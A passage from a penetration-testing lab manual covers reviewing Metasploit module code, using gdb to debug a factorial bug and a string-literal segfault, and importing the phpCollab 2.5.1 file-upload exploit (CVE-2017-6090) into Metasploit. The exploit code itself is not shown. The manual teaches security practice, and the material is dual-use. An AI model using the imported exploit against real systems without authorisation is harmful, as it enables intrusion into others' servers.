- We want to open the module, so navigate to Places and click Computer. Computer window appears, navigate to /usr/share/metasploit-framework/modules/auxiliary/scanner/http. In http folder scroll down and right-click on http_version.rb and click Open With Text Editor from the context menu.
- Take a few minutes to review the information, we will next look at one mixin. Once the review is done close the Text editor window.
- Navigate to Places and click Computer. Computer window appears, navigate to /usr/share/metasploit-framework/lib/rex/proto/http. In http folder right-click on client.rb and click Open With Text Editor from the context menu.
- This is the code for the mixin, and as you can see here it contains the routines we need for handling the sockets, which is why we can do the things we need to do to extract the data from the site.
The key to this routine is in the class's initialize method:
self.hostname = host
self.port = port.to_i
self.context = context
self.ssl = ssl
self.ssl_version = ssl_version
self.proxies = proxies
self.username = username
self.password = password
This is the process you should follow when you are working as a practitioner and professional security and penetration tester. Always investigate the code that is being used BEFORE you ever deploy it on a site.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Take an exploit from the Metasploit and review it
- Create a small program and work through the basic debugging process
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a text editor of your choice (here, leafpad). When the Leafpad window appears, enter the following code, then navigate to File and click Save As:
#include <iostream>
#include <cmath>
using namespace std;
int ComputeFactorial(int number) {   // returns number!
    int fact = 0;
    for (int j = 1; j <= number; j++) {
        fact = fact * j;
    }
    return fact;
}
double ComputeSeriesValue(double x, int n) {   // sum of x^k / k! for k = 0..n
    double seriesValue = 0.0;
    double xpow = 1;
    for (int k = 0; k <= n; k++) {
        seriesValue += xpow / ComputeFactorial(k);
        xpow = xpow * x;
    }
    return seriesValue;
}

int main() {
    cout << "This program is used to compute the value of the following series : " << endl;
    cout << "(x^0)/0! + (x^1)/1! + (x^2)/2! + (x^3)/3! + (x^4)/4! + ........ + (x^n)/n! " << endl;
    cout << "Please enter the value of x : ";
    double x;
    cin >> x;
    int n;
    cout << endl << "Please enter an integer value for n : ";
    cin >> n;
    cout << endl;

    double seriesValue = ComputeSeriesValue(x, n);
    cout << "The value of the series for the values entered is "
         << seriesValue << endl;
    return 0;
}
- Save As window appears, click root as the location to save, type buggy.cpp in the Name field and click Save. Close the text editor window after you have saved the file.
- Once you have the code entered, it is fun time! Try and compile it. Open a terminal window, type g++ -g buggy.cpp -o buggy and press Enter.
- Once the program has compiled, type ./buggy and press Enter to execute the code. This should run your program: just a simple program that has a bug, so that no matter what data is entered it will report the answer as inf.
This is not a cyber security type of problem, but it is one that can help us learn the gdb basics.
- We are now ready to start the debugger. Type gdb buggy and press Enter. This will load our code into the debugger so we can investigate it.
- Look at the source code and set a breakpoint at line 32, which is double seriesValue = ComputeSeriesValue(x, n);. In the gdb terminal type b 32 and press Enter.
- Now we start to run the program in the debugger. Type run and press Enter.
If you need to supply command-line arguments for the execution of the program, simply include them after the run command, just as you normally would on the command line.
- The program starts running and asks us for the input. Let's enter the values x=2 and n=3. The expected output value is 5. The following is a snapshot of the program running in the debugger:
This program is used to compute the value of the following series :
(x^0)/0! + (x^1)/1! + (x^2)/2! + (x^3)/3! + (x^4)/4! + …….. + (x^n)/n!
Please enter the value of x : 2
Please enter an integer value for n : 3
Breakpoint 1, main () at buggy.cpp:32
32 double seriesValue = ComputeSeriesValue(x, n);
Note that the program execution stopped at our first (and only) breakpoint.
- Step into the ComputeSeriesValue() function. To step into a function call, at the (gdb) prompt type step and press Enter:
ComputeSeriesValue (x=2, n=3) at buggy.cpp:12
12 double seriesValue = 0.0;
At this point, the program control is at the first statement of the function ComputeSeriesValue (x=2, n=3).
- Next let's step through the program until we get into ComputeFactorial. At the (gdb) prompt type next and press Enter:
13 double xpow=1;
- At the (gdb) prompt type n and press Enter:
14 for (int k = 0; k <= n; k++) {
- At the (gdb) prompt just press Enter:
15 seriesValue += xpow / ComputeFactorial(k) ;
- At the (gdb) prompt type s and press Enter:
ComputeFactorial (number=0) at buggy.cpp:5
5 int fact=0;
- Here we use the next command, which is similar to step except that it steps over (instead of into) functions. The distinction doesn't matter here since there are no function calls on those lines. You may use the shortest unambiguous spelling of a GDB command to save some typing; here we use n and s instead of next and step, respectively. If the command is simply a repeat of the previous command, you can just hit Enter, which will execute the last command again. Finally, we step (with s) into ComputeFactorial(). (If we'd used next, it would have stepped over ComputeFactorial.)
Where are we?
If you want to know where you are in the program's execution (and how, to some extent, you got there), you can view the contents of the stack using the backtrace command as follows:
At the (gdb) prompt type bt and press Enter.
Watching changes, we can step through the program and examine the values using the print command.
- At the (gdb) prompt type n and press Enter:
6 for (int j = 1; j <= number; j++) {
- At the (gdb) prompt type n and press Enter:
9 return fact;
- At the (gdb) prompt type n and press Enter:
10 }
- At the (gdb) prompt type print fact and press Enter:
$1 = 0
- At the (gdb) prompt type n and press Enter:
16 xpow = xpow * x;
- Type quit and press Enter to exit from the debugger.
Type y and press Enter at the Quit anyway warning. Minimize the terminal window.
- The print command (abbreviated p) reveals that the value of fact never changes. Note that the function is returning a value of 0 for the function call ComputeFactorial(number=0). This is an ERROR!
By taking a closer look at the values printed above, we realize that we are computing fact = fact * j where fact has been initialized to 0; fact should have been initialized to 1.
Navigate to the root location and open the buggy.cpp file with any text editor of your choice; buggy.cpp opens up in the text editor you have chosen.
Change the line int fact = 0; to int fact = 1; as shown in the screenshot, then save the file and minimize it.
- Maximize the terminal window, type g++ -g buggy.cpp -o buggy and press Enter.
- Type ./buggy and press Enter to run the program, and enter the values of x and n when prompted; you should get the expected output.
Close all the windows.
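The corrected arithmetic, as an added example written for this page rather than the lab's own buggy.cpp: the same factorial and series functions in C, so it can be built with gcc -g and stepped through in gdb exactly as above, with fact starting at 1 as the fix describes. It also handles a case the lab leaves out: a 32-bit int cannot hold 13!, so the factorial rejects n > 12 and the series reports NAN for such input instead of silently wrapping. The lower-case function names, the input guard and the file name in the comment are assumptions of this example.

```c
#include <math.h>
#include <stdio.h>

/* Added example, not the lab's buggy.cpp: the lab's ComputeFactorial with the
 * initialisation bug fixed (fact starts at 1, not 0). The guard is an addition:
 * n! no longer fits a 32-bit int once n > 12, so larger n is rejected instead
 * of silently overflowing. Returns -1 on rejected input. */
int compute_factorial(int number)
{
    if (number < 0 || number > 12)
        return -1;
    int fact = 1;                  /* the lab's bug was "int fact = 0;" */
    for (int j = 1; j <= number; j++)
        fact = fact * j;
    return fact;
}

/* Sum of x^k / k! for k = 0..n, the series the lab's program prints.
 * Returns NAN when the factorial guard rejects a term. */
double compute_series_value(double x, int n)
{
    double series_value = 0.0;
    double xpow = 1.0;             /* x^0 */
    for (int k = 0; k <= n; k++) {
        int fact = compute_factorial(k);
        if (fact < 0)
            return NAN;
        series_value += xpow / fact;   /* fact is never 0 now, so no inf */
        xpow = xpow * x;
    }
    return series_value;
}

/* Same prompts as the lab's program, so it can be run and stepped the same way:
 * gcc -g series_fixed.c -o series_fixed && gdb ./series_fixed   (file name assumed) */
int main(void)
{
    double x;
    int n;
    printf("Please enter the value of x : ");
    if (scanf("%lf", &x) != 1)
        return 1;
    printf("Please enter an integer value for n : ");
    if (scanf("%d", &n) != 1)
        return 1;
    printf("The value of the series for the values entered is %g\n",
           compute_series_value(x, n));
    return 0;
}
```

Set a breakpoint on compute_factorial and print fact after the loop: with the initialisation fixed it grows as 1, 1, 2, 6, 24 instead of staying at 0, which is the change the lab asked you to observe.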
Now that we have looked at a buggy piece of code, let's look at one that causes a core dump.
- Open a new text editor of your choice (here, leafpad), and type the following code:
#include <stdio.h>

int main(void)
{
    char *temp = "Paras";   /* pointer to a string literal */
    int i;
    i = 0;
    temp[3] = 'F';          /* line 8: writes into the literal */
    for (i = 0; i < 5; i++)
        printf("%c\n", temp[i]);
    return 0;
}
Navigate to File and click Save As.
- Save As window appears, type coredump.c in the Name field, choose root as the location to save the file and click Save.
Minimize the text editor window.
- Open a terminal window, type gcc coredump.c -g -o coredump and press Enter.
- Type ./coredump and press Enter. This will result in a segmentation fault. When we get a segmentation fault, we might have a core file that we can look at for assistance, depending on how the machine has been set up.
- Type gdb coredump core and press Enter.
- In this instance we do not have the core dump, but that is okay; we can still get the data from the debugger. Type run and press Enter in the gdb terminal.
The program will show us the location of the problem, and you can see it is on line 8: the programmer is assigning a literal string to a pointer, and we cannot manipulate it as the code is trying to do.
We find that temp is a char* which has been assigned a string literal, and so we cannot modify the contents of the literal as on line 8. This is what is causing the core dump. The process we have followed here is the basics and beginnings of debugging, and you are encouraged to explore it more if you want to write your own exploits.
- We have accomplished what we wanted to in this exercise, close all programs and clean up from the exercise.
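For the core dump above, the following added example (not the lab's coredump.c) puts the crashing form next to the safe one: the string literal is copied into a writable array before a character is changed, and the destination size is checked so the copy cannot overrun. patch_copy and patch_literal_crashes are names chosen for this example; the crashing function is kept for comparison only and is never called.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the lab's coredump.c: the same "change one letter"
 * operation done two ways. */

/* Safe form: copy the literal into caller-owned writable memory, then edit.
 * dst must have room for strlen("Paras") + 1 bytes; returns NULL if not. */
char *patch_copy(char *dst, size_t dstlen)
{
    const char *literal = "Paras";      /* the bytes live in read-only storage */
    if (dstlen < strlen(literal) + 1)
        return NULL;                    /* refuse rather than overflow dst */
    strcpy(dst, literal);               /* now in writable memory we own */
    dst[3] = 'F';                       /* the lab's line 8, done on the copy */
    return dst;
}

/* What the lab's program did: the literal itself is the write target. gcc
 * places it in .rodata, so the assignment faults with SIGSEGV at run time.
 * Declared but never called here; it exists so the two forms sit side by side. */
void patch_literal_crashes(void)
{
    char *temp = "Paras";               /* non-const pointer to read-only bytes */
    temp[3] = 'F';                      /* SIGSEGV: write to .rodata */
}

int main(void)
{
    char buf[8];
    if (patch_copy(buf, sizeof buf) != NULL)
        puts(buf);                      /* ParFs */
    return 0;
}
```

The distinction is the one gdb's backtrace pointed at: a `char *` initialised from a literal only points at the literal, while `char buf[]` or an explicit copy gives you bytes you are allowed to change. Building with `-Wwrite-strings` makes gcc warn about the first form at compile time instead of at run time.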
- Create a small program and work through the basic debugging process
Exercise 10: Adding an Exploit to Metasploit
Scenario
In this lab you will
- Take an exploit from the exploit database and add it to Metasploit
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- There are times when a new exploit will be added to the exploit database, or you might even want to build and customize one on your own; we will work through the process of doing that in this lab.
We have two Ruby exploits that have been downloaded into the Downloads folder in Kali. We will work with the 43519 script file; this is the phpCollab 2.5.1 - Unauthenticated File Upload exploit, which has the CVE number CVE-2017-6090 and was published 1-11-2018.
- Open a terminal window, type gedit /root/Downloads/43519.rb and press Enter. This command will open the file in the gedit text editor window.
- The 43519.rb file opens up in the text editor window as shown in the screenshot. As you see here, this is the structure of a Metasploit module, and it contains the information that we can view with the info command in the modules. Take a few minutes and review the code within the module. As a reminder, we need to vet all scripts before we ever use them in our testing, and that is why we are covering this here. If you are new to Ruby then you need to research it and understand what you are running when you run these modules against clients who are contracting you as a professional penetration tester.
Close the text editor window after review.
- We need to copy the module. The easiest way is to enter the Metasploit directory and then copy the code into it: type cd /usr/share/metasploit-framework/modules/exploits/multi/http and press Enter.
This will place you in the directory that contains the http exploit modules; since we are working with PHP this seems like a good place to put it.
- Copy the code with the following command: type cp /root/Downloads/43519.rb phpcollab.rb and press Enter. This will copy the exploit to the directory and rename it.
- Type service postgresql start and press Enter.
- Type msfconsole and press Enter to start the Metasploit console, and then reload the exploits.
- When msfconsole appears, type reload_all and press Enter.
- Now, it is time to see if we can find our added exploit, and the best way to do that is to search for it, type search phpcollab and press Enter.
- You should see your exploit! Congratulations! You have just updated exploits in Metasploit, type use exploit/multi/http/phpcollab and press Enter.
- Once you are in the exploit, type info and press Enter to read about the exploit, and then once you have finished reading, then type show options and press Enter. Review the options that are available.
- To view the Targets type show targets and press Enter. In this case we only have one target.
- Here is some information about this application. phpCollab is an open-source internet-enabled collaboration workspace for project teams. Modeled on Macromedia Sitespring, phpCollab's architecture allows the consulting team to share information with each other in one space and publish that information, when desired, to another space for the client. phpCollab encompasses the most important aspects of project management, such as task planning and document sharing, and hooks into other open source applications, such as Mantis for bug tracking and PHP-Nuke (using phpCollabPublisher) for content management, for ongoing project support. phpCollab's community, part of the larger SourceForge open source software community, is highly active, and the dedicated volunteer team of developers, testers, and documenters is constantly enhancing the application to meet user needs.
You could set up a lab and then test your exploit as well.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Take an exploit from the exploit database and add it to Metasploit